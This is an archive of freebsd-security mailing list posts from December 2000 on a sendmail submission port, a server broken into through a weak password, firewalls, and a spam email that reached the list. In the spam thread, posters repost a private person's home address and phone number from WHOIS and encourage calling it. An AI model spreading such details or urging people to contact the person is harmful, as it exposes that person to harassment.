Yes. If you want to disable it, add: FEATURE(`no_default_msa') to your mc file and rebuild the cf. Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 13 Dec 2000, Szilveszter Adam wrote: > Hello! > > On Wed, Dec 13, 2000 at 05:32:35PM +0100, Dag-Erling Smorgrav wrote: > > > 587/tcp open submission > > > > This is probably a back door the intruder left behind. Use sockstat(1) > > to determine which process owns the socket, and kill it (and make sure > > it doesn't restart when you reboot) > > > > Uhm, if he is running sendmail (a recent version,) than it may be just > that: sendmail now runs on two ports, 25 and 587 unless configured > otherwise. OTB it will listen on both ports. Esp since he said that > telnetting to this port starts up a sendmail which is expected behaviour. > > -- > Regards: > > Szilveszter ADAM > Szeged University > Szeged Hungary > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 9:10:24 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 09:10:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 0531337B400 for ; Wed, 13 Dec 2000 09:10:21 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA12571; Wed, 13 Dec 2000 10:09:47 -0700 (MST) Message-Id: <4.3.2.7.2.20001213100839.0465c320@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 10:09:43 -0700 To: Robert McCallum , misc@openbsd.org From: Brett Glass Subject: Re: 911 lockdown! Cc: freebsd-security@FreeBSD.ORG In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Pardon me if I'm missing something here, but how would a firewall prevent someone from cracking a guessable password on a legitimate user account? --Brett Glass At 09:18 AM 12/13/2000, Robert McCallum wrote: >My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' >the server 'yet'. But I do see that they have obtained access to a user >account. It apears they cracked a users account which I found out that one >of my users did not adhere to our security policy and set a password that >was not in accordance to our password policy. .... >In conclusion, I need to setup a firewall on that particular host ASAP. "Were parties here divided merely by greediness for office..., to take a part with either would be unworthy of a reasonable or moral man." --Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 9:44:55 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 09:44:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from Socrates.i-pi.com (Socrates.i-pi.com [198.49.217.5]) by hub.freebsd.org (Postfix) with ESMTP id 776DB37B404 for ; Wed, 13 Dec 2000 09:44:51 -0800 (PST) Received: (from ingham@localhost) by Socrates.i-pi.com (8.11.1/8.11.1) id eBDHhNO75689; Wed, 13 Dec 2000 10:43:23 -0700 (MST) (envelope-from ingham) Date: Wed, 13 Dec 2000 10:43:23 -0700 From: Kenneth Ingham To: Robert McCallum Cc: misc@openbsd.org, freebsd-security@freebsd.org Subject: Re: 911 lockdown! Message-ID: <20001213104316.C75563@Socrates.i-pi.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from robert@cards2talk.com on Wed, Dec 13, 2000 at 11:18:55AM -0500 Sender: ingham@Socrates.i-pi.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I would recommend running a password guesser (Crack, John the Ripper, etc) on the rest of your accounts. This might give you a heads up on other accounts to watch/disable. Kenneth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 10:25:33 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 10:25:30 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from metrocon.com (metrocon.com [198.143.64.100]) by hub.freebsd.org (Postfix) with ESMTP id 267AF37B400 for ; Wed, 13 Dec 2000 10:25:29 -0800 (PST) Received: from office2.metrocon.com ([198.143.64.239]) by metrocon.com (8.9.3/8.9.3) with ESMTP id NAA34108 for ; Wed, 13 Dec 2000 13:25:19 -0500 (EST) (envelope-from tzink@metrocon.com) Message-Id: <5.0.0.25.0.20001213132136.00a2c7b0@mail.metrocon.com> X-Sender: tzink@mail.metrocon.com X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 13 Dec 2000 13:26:27 -0500 To: freebsd-security@FreeBSD.ORG From: Terry Zink Subject: Re: 911 lockdown! In-Reply-To: <4.3.2.7.2.20001213100839.0465c320@localhost> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Rather easily. If the outsider cannot get into the proper services (ssh most likely) to log in, then he cant crack. Most crackers use telnet, or pop. But if he finds the pop pass he cant do much if telnet and ssh are closed to all but the internal network. My biggest problem with firewalls is you need to throw them behind a nat generally speaking to use them (If anyone can gimme a simple way to set the gateway to a bsd box and have the bsd box allow full access to the ip but blocking out ips from the source from getting to it .... .. lemme know) I know that last sentence made no sense, and im sorry. Long day, not a priority. Biggest problem I have with firewalling the servers at my job is... we're an ISP... Adding a firewall presents yet ANOTHER single point of failure.. Anyways that was my rant for the day, hope you all enjoyed :) At 10:09 AM 12/13/00 -0700, you wrote: >Pardon me if I'm missing something here, but how would a firewall >prevent someone from cracking a guessable password on a legitimate >user account? > >--Brett Glass > >At 09:18 AM 12/13/2000, Robert McCallum wrote: > > > >My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' > >the server 'yet'. But I do see that they have obtained access to a user > >account. It apears they cracked a users account which I found out that one > >of my users did not adhere to our security policy and set a password that > >was not in accordance to our password policy. > >.... > > >In conclusion, I need to setup a firewall on that particular host ASAP. > > > >"Were parties here divided merely by greediness for office..., >to take a part with either would be unworthy of a reasonable >or moral man." --Thomas Jefferson > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message Regards, Terry Zink Metrocon Communications Phone: (212) 661-6800 ext. 1554 Fax: (212) 661-1229 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 11:24: 2 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 11:24:01 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id AD78837B402 for ; Wed, 13 Dec 2000 11:24:00 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA14258; Wed, 13 Dec 2000 12:23:29 -0700 (MST) Message-Id: <4.3.2.7.2.20001213122157.00b82ba0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 12:23:25 -0700 To: Terry Zink , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: 911 lockdown! In-Reply-To: <5.0.0.25.0.20001213132136.00a2c7b0@mail.metrocon.com> References: <4.3.2.7.2.20001213100839.0465c320@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:26 AM 12/13/2000, Terry Zink wrote: >Rather easily. If the outsider cannot get into the proper services (ssh >most likely) to log in, then he cant crack. Ah, but then neither can legitimate users. This fellow was talking about leaving quite a few services available through the firewall. --Brett "Were parties here divided merely by greediness for office..., to take a part with either would be unworthy of a reasonable or moral man." --Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 12:31:25 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 12:30:49 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail2.rdc3.on.home.com (mail2.rdc3.on.home.com [24.2.9.41]) by hub.freebsd.org (Postfix) with ESMTP id CEF9037B400; Wed, 13 Dec 2000 12:28:45 -0800 (PST) Received: from host ([24.43.249.103]) by mail2.rdc3.on.home.com (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20001213202841.OLWG26458.mail2.rdc3.on.home.com@host>; Wed, 13 Dec 2000 12:28:41 -0800 Message-ID: <001501c0654b$75146f80$67f92b18@address.com> Reply-To: "Jim Gunn" From: "Jim Gunn" To: Subject: professional art community Date: Wed, 13 Dec 2000 15:26:06 -0600 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0012_01C06519.0DCCFEA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C06519.0DCCFEA0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Chalky Chalk WELCOMES YOU: This is not Spam. If you are not a part of the picture framing or art = industry this was not intended for you and we have no us for your = interest what so ever. To unsubscribe see bottom *************************************************************************= * News service for the professional art community. This information will = keep you up-to-date=20 On the latest trends and events in the industry! = *************************************************************************= * NEW SHOWCASES THIS WEEK *************************************************************************= * Finding a winner. The true winner is the art print investment that you = enjoy.=20 Time will gain the value and the value is higher with less time spent. http://www.geocities.com/chalkychalkpub5/chalkychalkpub5.htm The framing industry is picking up. Many galleries have Communicated an increase in custom framing. *************************************************************************= * Cash on the wall. Learn how anyone can invest in art and make it pay = off. How collector's buy up prints and sell.=20 www.chalkychalk.com *************************************************************************= * Sell/Trade/Buy *************************************************************************= * Potapoff SNOWED IN=20 *************************************************************************= * http://www.geocities.com/chalkychalkpub3/chalkychalkpub3.htm *************************************************************************= * LINDA HOBLEY OCTOBER FLAMES *************************************************************************= * http://www.geocities.com/chalkychalkpub2/chalkychalkpub2.htm *************************************************************************= * ANDREW KISS THE BANDIT *************************************************************************= * http://www.geocities.com/chalkychalkpub4/chalkychalkpub4.htm *************************************************************************= * LIZ MITTEN RYAN REFLECTION *************************************************************************= * http://www.geocities.com/chalkychalkpub5/chalkychalkpub5.htm *************************************************************************= * CHRIS NEWBOLD SERENITY *************************************************************************= * http://www.geocities.com/chalkychalkpub/chalkychalkpub.htm *************************************************************************= * Framing equipment. *************************************************************************= * http://www.larsonjuhl.com http://www.knoell.com http://www.clearmountcorp.com=20 http://www.speed-mat.com *************************************************************************= * Moulding, mats & supplies *************************************************************************= * http://www.pictureframes.com http://www.imageperfectglass.com http://www.crescentcardboard.com http://www.fotiou.com http://www.mtsframes.com=20 http://www.gulloinc.com=20 http://www.oxfordpictureframe.com http://www.rustic-creations.com *************************************************************************= * Art links to resources. *************************************************************************= * www.chalkychalk.com http://www.artaffairs.com http://www.dragonflyproductionsinc.com http://www.hop.ca http://www. bevellededge. com http://www.torontoimageworks.com *************************************************************************= * *************************************************************************= * The Riddle of the day=20 What am I? 1.. Everyone has me. 2.. You will all lose me. 3.. Some see me as substantial & other see me meaningless. 4.. I have never been understood and may never be understood=20 5.. Without me is to be without you and without me is to be without. 6.. I will be the one reason that grants you the possibility to salve = this riddle. 7.. Without me this riddle could never be written. To find out the answer to what am I? Look to:=20 www.chalkychalk.com *************************************************************************= * TO UNSUBSCRIBE FROM ART -NEWS, SIMPLY e-mail:=20 chalkychalk@bizland.com AND WRITE - STOP-in the subject line. This is not Spam. If you are not a part of the picture framing or art = industry this was not intended for you and we have no us for your = interest what so ever. ------=_NextPart_000_0012_01C06519.0DCCFEA0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Chalky Chalk WELCOMES=20 YOU:

This is not Spam. If you are not a part of the picture framing or art = industry this was not intended for you and we have no us for your = interest what=20 so ever.

To unsubscribe see bottom


****************************************************************= **********
News=20 service for the professional art community. This information will keep = you=20 up-to-date

On the latest trends and events in the industry!=20 *************************************************************************= *

NEW SHOWCASES THIS=20 WEEK
*********************************************************= *****************
Finding=20 a winner. The true winner is the art print investment that you enjoy. =

Time will gain the value and the value is higher with less time = spent.


http://www.geocities.com/chalkychalkpub5/chalkychalkpub5.= htm

The framing industry is picking up. Many galleries have

Communicated an increase in custom framing.

**********************************************************************= ****
Cash=20 on the wall. Learn how anyone can invest in art and make it pay off. How = collector’s buy up prints and sell.


www.chalkychalk.com


****************************************************************= **********

Sell/Trade/Buy

**********************************************************************= ****

Potapoff SNOWED IN

**********************************************************************= ****
http://www.geocities.com/chalkychalkpub3/chalkychalkpub3.= htm

***********************************************= ***************************
LINDA=20 HOBLEY OCTOBER FLAMES

**********************************************************************= ****

http://www.geocities.com/chalkychalkpub2/chalkychalkpub2.htm

**********************************************************************= ****

ANDREW KISS THE BANDIT

**********************************************************************= ****

http://www.geocities.com/chalkychalkpub4/chalkychalkpub4.htm

**********************************************************************= ****

LIZ MITTEN RYAN REFLECTION

**********************************************************************= ****

http://www.geocities.com/chalkychalkpub5/chalkychalkpub5.htm

 

**********************************************************************= ****

CHRIS NEWBOLD=20 SERENITY
*************************************************************= *************

http://www.geocities.com/chalkychalkpub/chalkychalkpub.htm

**********************************************************************= ****

Framing equipment.

**********************************************************************= ****

http://www.larsonjuhl.com

http://www.knoell.com

http://www.clearmountcorp.com =

http://www.speed-mat.com

 

**********************************************************************= ****

Moulding, mats & supplies

**********************************************************************= ****

http://www.pictureframes.com

http://www.imageperfectglass.com

http://www.crescentcardboard.com

http://www.fotiou.com

http://www.mtsframes.com

http://www.gulloinc.com

http://www.oxfordpictureframe.com

http://www.rustic-creations.com

 

**********************************************************************= ****

Art links to resources.

**********************************************************************= ****

www.chalkychalk.com

http://www.artaffairs.com

http://www.dragonflyproductionsinc.com

http://www.hop.ca

http://www. = bevellededge.=20 com

http://www.torontoimageworks.com

 

**********************************************************************= ****

**********************************************************************= ****

The Riddle of the day

What am I?
  1. Everyone has me.
  2. You will all lose me.
  3. Some see me as substantial & other see me meaningless.
  4. I have never been understood and may never be understood
  5. Without me is to be without you and without me is to be = without.
  6. I will be the one reason that grants you the possibility to salve = this=20 riddle.
  7. Without me this riddle could never be written.

To find out the answer to what am I? Look to:

www.chalkychalk.com

**********************************************************************= ****

 

 

 

 

 

TO UNSUBSCRIBE FROM ART -NEWS, SIMPLY e-mail:

chalkychalk@bizland.com

AND WRITE – STOP-in the subject line.
This is not Spam. If = you are not a=20 part of the picture framing or art industry this was not intended for = you and we=20 have no us for your interest what so=20 ever.

------=_NextPart_000_0012_01C06519.0DCCFEA0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13: 6:40 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:06:37 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 9484837B699 for ; Wed, 13 Dec 2000 13:06:36 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15551 for ; Wed, 13 Dec 2000 14:06:30 -0700 (MST) Message-Id: <4.3.2.7.2.20001213135715.00b82760@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:05:26 -0700 To: security@freebsd.org From: Brett Glass Subject: Get that spammer! (Was: professional art community) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Several copies of this same spam just tried to get through our server. The first set off an alarm and we're blocking. If you want to complain, the relevant addresses are: abuse@rogerswave.ca (The spammer's DSL provider) abuse@bizland-inc.com (The spammer's e-mail provider and Web host) securityalert@bizland-inc.com (Another abuse address at the hosting firm) Bizland-inc.com says that they WILL act if they see multiple complaints about spamming. Also, the WHOIS information for the domain "chalkychalk.com" includes the following administrative contact: Administrative Contact: Chalky Chalk Chris Newbold 44 buchanan cres brantford, ON N3P2A5 CA Phone: (519) 756 6102 Email: chalkychalk@home.com Might be worth a call. --Brett Glass >Delivered-To: freebsd-security@freebsd.org >: > > :: >: > > >:: >: >Reply-To: "Jim Gunn" >From: "Jim Gunn" >To: >Subject: professional art community >Date: Wed, 13 Dec 2000 15:26:06 -0600 >: >X-Security: Warning! Do not open files attached to e-mail if you do not > have an up-to-date virus protection program or did not expect to > receive them. Even if the message is from someone you know, an > attachment can contain a virus sent without his or her knowledge. >: > >: >: >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 >: >Sender: owner-freebsd-security@FreeBSD.ORG >X-Loop: FreeBSD.org >: >: "Were parties here divided merely by greediness for office..., to take a part with either would be unworthy of a reasonable or moral man." --Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:10:13 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:10:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stage1.thirdage.com (stage1.thirdage.com [4.18.197.236]) by hub.freebsd.org (Postfix) with ESMTP id 39CD837B698 for ; Wed, 13 Dec 2000 13:10:08 -0800 (PST) Received: (from jal@localhost) by stage1.thirdage.com (8.9.1/8.9.1) id NAA18034; Wed, 13 Dec 2000 13:13:05 -0800 (PST) Date: Wed, 13 Dec 2000 13:13:05 -0800 From: "Jamie A. Lawrence" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Get that spammer! (Was: professional art community) Message-ID: <20001213131305.B17715@stage1.thirdage.com> References: <4.3.2.7.2.20001213135715.00b82760@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.3.2.7.2.20001213135715.00b82760@localhost>; from Brett Glass on Wed, Dec 13, 2000 at 02:05:26PM -0700 Sender: jal@stage1.thirdage.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 13, 2000 at 02:05:26PM -0700, Brett Glass wrote: > Administrative Contact: > Chalky Chalk > Chris Newbold > 44 buchanan cres > brantford, ON N3P2A5 > CA > Phone: (519) 756 6102 > Email: chalkychalk@home.com > > Might be worth a call. I thought I'd waste a dime on it. "This international call requires special billing approval." Thus spake ATT. -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:15:43 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:15:39 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 83B5137B699 for ; Wed, 13 Dec 2000 13:15:38 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15675; Wed, 13 Dec 2000 14:15:31 -0700 (MST) Message-Id: <4.3.2.7.2.20001213141435.00e00100@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:15:28 -0700 To: "Jamie A. Lawrence" From: Brett Glass Subject: Re: Get that spammer! (Was: professional art community) Cc: security@FreeBSD.ORG In-Reply-To: <20001213131305.B17715@stage1.thirdage.com> References: <4.3.2.7.2.20001213135715.00b82760@localhost> <4.3.2.7.2.20001213135715.00b82760@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:13 PM 12/13/2000, Jamie A. Lawrence wrote: >"This international call requires special billing approval." > >Thus spake ATT. I wonder if this is something unique about your phone service. I got through.... Got an answering machine, though. --Brett "Were parties here divided merely by greediness for office..., to take a part with either would be unworthy of a reasonable or moral man." --Thomas Jefferson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:24: 1 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:23:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stage1.thirdage.com (stage1.thirdage.com [4.18.197.236]) by hub.freebsd.org (Postfix) with ESMTP id 4660537B400 for ; Wed, 13 Dec 2000 13:23:58 -0800 (PST) Received: (from jal@localhost) by stage1.thirdage.com (8.9.1/8.9.1) id NAA18495; Wed, 13 Dec 2000 13:26:56 -0800 (PST) Date: Wed, 13 Dec 2000 13:26:55 -0800 From: "Jamie A. Lawrence" To: Brett Glass Cc: "Jamie A. Lawrence" , security@FreeBSD.ORG Subject: Re: Get that spammer! (Was: professional art community) Message-ID: <20001213132655.A18438@stage1.thirdage.com> References: <4.3.2.7.2.20001213135715.00b82760@localhost> <4.3.2.7.2.20001213135715.00b82760@localhost> <20001213131305.B17715@stage1.thirdage.com> <4.3.2.7.2.20001213141435.00e00100@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <4.3.2.7.2.20001213141435.00e00100@localhost>; from Brett Glass on Wed, Dec 13, 2000 at 02:15:28PM -0700 Sender: jal@stage1.thirdage.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 13, 2000 at 02:15:28PM -0700, Brett Glass wrote: > > I wonder if this is something unique about your phone service. > I got through.... Got an answering machine, though. > > --Brett I'm not inclined to spend a lot of time on it, but this came from a calling card attached to ATT. (Yes, way expensive, but keeping billing separate is cheaper than sorting it out.) -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:25:46 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:25:41 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 3B95F37B699 for ; Wed, 13 Dec 2000 13:25:41 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBDLP5s30863; Wed, 13 Dec 2000 16:25:06 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Wed, 13 Dec 2000 16:25:05 -0500 (EST) From: Rob Simmons To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Get that spammer! (Was: professional art community) In-Reply-To: <4.3.2.7.2.20001213135715.00b82760@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Already sent to spamcop :) Julian Haight runs quite a good service over at spamcop, it parses the spam and does everything that you described below, and creates nice complaints and sends them to the appropriate parties involved. The origin of this particular piece of spam is owned by @home.com so mainly send complaints to abuse@home.com Robert Simmons Systems Administrator http://www.wlcg.com/ On Wed, 13 Dec 2000, Brett Glass wrote: > Several copies of this same spam just tried to get through our > server. The first set off an alarm and we're blocking. If you want to > complain, the relevant addresses are: > > abuse@rogerswave.ca (The spammer's DSL provider) > abuse@bizland-inc.com (The spammer's e-mail provider and Web host) > securityalert@bizland-inc.com (Another abuse address at the hosting firm) > > Bizland-inc.com says that they WILL act if they see multiple > complaints about spamming. > > Also, the WHOIS information for the domain "chalkychalk.com" includes > the following administrative contact: > > Administrative Contact: > Chalky Chalk > Chris Newbold > 44 buchanan cres > brantford, ON N3P2A5 > CA > Phone: (519) 756 6102 > Email: chalkychalk@home.com > > Might be worth a call. > > --Brett Glass > > > >Delivered-To: freebsd-security@freebsd.org > >: > > > > :: > >: > > > > > >:: > >: > >Reply-To: "Jim Gunn" > >From: "Jim Gunn" > >To: > >Subject: professional art community > >Date: Wed, 13 Dec 2000 15:26:06 -0600 > >: > >X-Security: Warning! Do not open files attached to e-mail if you do not > > have an up-to-date virus protection program or did not expect to > > receive them. Even if the message is from someone you know, an > > attachment can contain a virus sent without his or her knowledge. > >: > > > >: > >: > >X-Mailer: Microsoft Outlook Express 5.50.4133.2400 > >: > >Sender: owner-freebsd-security@FreeBSD.ORG > >X-Loop: FreeBSD.org > >: > >: > > > "Were parties here divided merely by greediness for office..., > to take a part with either would be unworthy of a reasonable > or moral man." --Thomas Jefferson > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:33:21 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:33:18 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id 9660937B402 for ; Wed, 13 Dec 2000 13:33:18 -0800 (PST) Received: from localhost (marquis@localhost) by roble.com with ESMTP id eBDLXIw71392 for ; Wed, 13 Dec 2000 13:33:18 -0800 (PST) Date: Wed, 13 Dec 2000 13:33:18 -0800 (PST) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: Get that spammer! (bizland-inc.com) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Brett Glass wrote: > server. The first set off an alarm and we're blocking. If you want to > complain, the relevant addresses are: > > abuse@rogerswave.ca (The spammer's DSL provider) > abuse@bizland-inc.com (The spammer's e-mail provider and Web host) > securityalert@bizland-inc.com (Another abuse address at the hosting firm) Actually bizland-inc.com is the spammer, despite their misleading web page. Chalkychalk.com et al are Bizland customers. Bizland-inc.com, aka bizland.com, aka prontomail.com, aka click2site.com has a long history of spam on behalf of various customers. You can complain to Bizland's ISP, however, given the large volume and multiple incidents this ISP has not responded to it is likely they have a "pink contract" which permits the spam to continue. Bizland's ISP is Exodus, not known for AUP enforcement. The only real way to filter this spam, assuming you don't subscribe to ORBS (a cure which can sometimes be worse than the disease) is to add these domains (and netblocks) to your local sendmail/procmail/... filters. Roger Marquis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:33:49 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:33:47 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id CC4C337B402 for ; Wed, 13 Dec 2000 13:33:45 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA15916; Wed, 13 Dec 2000 14:33:23 -0700 (MST) Message-Id: <4.3.2.7.2.20001213143102.00e2d4d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:33:19 -0700 To: Rob Simmons From: Brett Glass Subject: Re: Get that spammer! (Was: professional art community) Cc: security@FreeBSD.ORG In-Reply-To: References: <4.3.2.7.2.20001213135715.00b82760@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:25 PM 12/13/2000, Rob Simmons wrote: >The origin of this particular piece of spam is owned by @home.com so >mainly send complaints to abuse@home.com Actually, @home.com in Canada isn't that simple.... It seems to be a franchise that's split up between different providers by city or province. When you see on.home.com in the domain, it's really rogerswave.ca. I don't know whether Julian's complaint script handles that.... I added it to mine about two months ago. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:36:51 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:36:48 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.cstone.net (mail.cstone.net [209.145.64.80]) by hub.freebsd.org (Postfix) with ESMTP id 6955137B69D for ; Wed, 13 Dec 2000 13:36:44 -0800 (PST) Received: from cstone.net (aylee.mrgoodbucks.com [209.145.93.143]) by mail.cstone.net (8.11.1/8.11.1) with ESMTP id eBDLYmu01026; Wed, 13 Dec 2000 16:34:48 -0500 (EST) Message-ID: <3A37EC6B.7033AF50@cstone.net> Date: Wed, 13 Dec 2000 16:38:51 -0500 From: Sean Michael Whipkey X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Get that spammer! (Was: professional art community) References: <4.3.2.7.2.20001213135715.00b82760@localhost> <4.3.2.7.2.20001213143102.00e2d4d0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > Actually, @home.com in Canada isn't that simple.... It seems to be > a franchise that's split up between different providers by city or > province. When you see on.home.com in the domain, it's really > rogerswave.ca. I 